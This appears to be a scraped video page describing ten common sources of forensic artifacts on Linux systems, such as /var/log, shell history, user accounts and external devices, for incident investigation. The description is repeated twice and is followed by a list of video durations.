filmov
tv
Top 10 forensic artefacts and data sources on Linux
Показать описание
🎓 MCSI Certified DFIR Specialist 🎓
💻🔎 Linux Forensics 🔎💻
💻🔎 MCSI Digital Forensics Library 🔎💻
Linux forensics is the process of identifying, extracting, and analyzing data from a Linux system for the purpose of determining the cause of a security incident. It can be used to find evidence of intrusion, malware, or other malicious activity. Linux forensics is a complex process that requires a deep understanding of the Linux operating system and how it stores data. It also requires knowledge of the tools and techniques used to extract and analyze data. There are many different tools and techniques that can be used for Linux forensics.
In this video, we will discuss common locations within a Linux environment where you can identify artifacts to aid your investigation. This includes
🔎 System Information
This information can provide investigators with insight into the activities that took place on the system and can help to identify any potential culprits.
🔎 /var/log
The /var/log directory is a common location for log files on many Linux systems. These log files can contain a wealth of information that may be useful in a digital forensics investigation. For example, the Apache web server creates log files in this directory that can contain information about who accessed what resources on the server. Other applications may also create log files in this directory, which can provide information about other aspects of the system.
🔎 Shell History
This is a record of all the commands that have been entered into the command line, which can give investigators a good idea of what the user has been up to. If there are suspicious commands in the history, or if certain commands are run frequently, this can be a red flag that something is going on. Additionally, the shell history can help investigators understand how a user interacts with the system, which can be helpful in identifying potential targets for investigation.
🔎 Filesystem
The filesystem can provide information on the location of specific files, which can be helpful in determining the order in which events occurred. Additionally, it can help investigators identify which files were accessed or modified recently, as well as which users had access to those files. Finally, the filesystem can also contain metadata that can be used to identify the type of data contained in a file, which can be helpful in determining its relevance to the investigation.
🔎 User Accounts
user accounts can provide investigators with valuable information about an individual’s online activity, including the websites they visit and the files they access. Additionally, user accounts can help investigators to identify potential victims and witnesses in a case. Finally, user accounts can also be used to track down the source of illegal or unauthorized activity.
🔎 Application Data
Application data can include everything from log files and error messages to user preferences and saved data. This data can be very helpful in understanding how a device was used and what may have happened on it. In some cases, application data can even be used to reconstruct events that have taken place on a device.
🔎 Networking
Linux systems often maintain logs of network activity, which can be useful in reconstructing what has happened. Additionally, Linux systems can be configured to encrypt communications, and the encryption keys can be recovered from the system to decrypt the data.
🔎 Services
Looking at the Linux services running on a system can give investigators important clues about what was happening on the system and who was using it. By understanding the different types of Linux services and how they work, investigators can more easily find evidence of criminal activity.
🔎 External Devices
External devices such as USB drives, memory cards, and external hard drives may hold valuable data that can help in a digital forensics investigation. By connecting these devices to a computer and running forensic software, it may be possible to extract data such as text messages, emails, document files, and pictures. This data can then be used to piece together what happened, who was involved, and what their motivations may have been.
🔎 Remote Connections
Digital forensics investigators often find themselves having to analyze remote connections in order to gain a better understanding of what has happened in a particular case. By understanding how data is transmitted between devices and over networks, investigators can often piece together a clearer picture of what has happened. Additionally, by analyzing remote connections, investigators may be able to identify potential suspects or witnesses that they would not have otherwise been aware of.
💻🔎 Linux Forensics 🔎💻
💻🔎 MCSI Digital Forensics Library 🔎💻
Linux forensics is the process of identifying, extracting, and analyzing data from a Linux system for the purpose of determining the cause of a security incident. It can be used to find evidence of intrusion, malware, or other malicious activity. Linux forensics is a complex process that requires a deep understanding of the Linux operating system and how it stores data. It also requires knowledge of the tools and techniques used to extract and analyze data. There are many different tools and techniques that can be used for Linux forensics.
In this video, we will discuss common locations within a Linux environment where you can identify artifacts to aid your investigation. This includes
🔎 System Information
This information can provide investigators with insight into the activities that took place on the system and can help to identify any potential culprits.
🔎 /var/log
The /var/log directory is a common location for log files on many Linux systems. These log files can contain a wealth of information that may be useful in a digital forensics investigation. For example, the Apache web server creates log files in this directory that can contain information about who accessed what resources on the server. Other applications may also create log files in this directory, which can provide information about other aspects of the system.
🔎 Shell History
This is a record of all the commands that have been entered into the command line, which can give investigators a good idea of what the user has been up to. If there are suspicious commands in the history, or if certain commands are run frequently, this can be a red flag that something is going on. Additionally, the shell history can help investigators understand how a user interacts with the system, which can be helpful in identifying potential targets for investigation.
🔎 Filesystem
The filesystem can provide information on the location of specific files, which can be helpful in determining the order in which events occurred. Additionally, it can help investigators identify which files were accessed or modified recently, as well as which users had access to those files. Finally, the filesystem can also contain metadata that can be used to identify the type of data contained in a file, which can be helpful in determining its relevance to the investigation.
🔎 User Accounts
user accounts can provide investigators with valuable information about an individual’s online activity, including the websites they visit and the files they access. Additionally, user accounts can help investigators to identify potential victims and witnesses in a case. Finally, user accounts can also be used to track down the source of illegal or unauthorized activity.
🔎 Application Data
Application data can include everything from log files and error messages to user preferences and saved data. This data can be very helpful in understanding how a device was used and what may have happened on it. In some cases, application data can even be used to reconstruct events that have taken place on a device.
🔎 Networking
Linux systems often maintain logs of network activity, which can be useful in reconstructing what has happened. Additionally, Linux systems can be configured to encrypt communications, and the encryption keys can be recovered from the system to decrypt the data.
🔎 Services
Looking at the Linux services running on a system can give investigators important clues about what was happening on the system and who was using it. By understanding the different types of Linux services and how they work, investigators can more easily find evidence of criminal activity.
🔎 External Devices
External devices such as USB drives, memory cards, and external hard drives may hold valuable data that can help in a digital forensics investigation. By connecting these devices to a computer and running forensic software, it may be possible to extract data such as text messages, emails, document files, and pictures. This data can then be used to piece together what happened, who was involved, and what their motivations may have been.
🔎 Remote Connections
Digital forensics investigators often find themselves having to analyze remote connections in order to gain a better understanding of what has happened in a particular case. By understanding how data is transmitted between devices and over networks, investigators can often piece together a clearer picture of what has happened. Additionally, by analyzing remote connections, investigators may be able to identify potential suspects or witnesses that they would not have otherwise been aware of.
0:05:39
0:04:54
0:00:48
0:16:38
0:02:35
0:27:31
0:18:16
0:35:12
0:14:03
0:45:36
0:18:36
0:05:55
0:23:17
0:00:53
0:35:34
0:28:31
0:21:51
0:34:49
0:50:45
0:15:22
1:02:04
1:03:51
0:20:16
0:40:29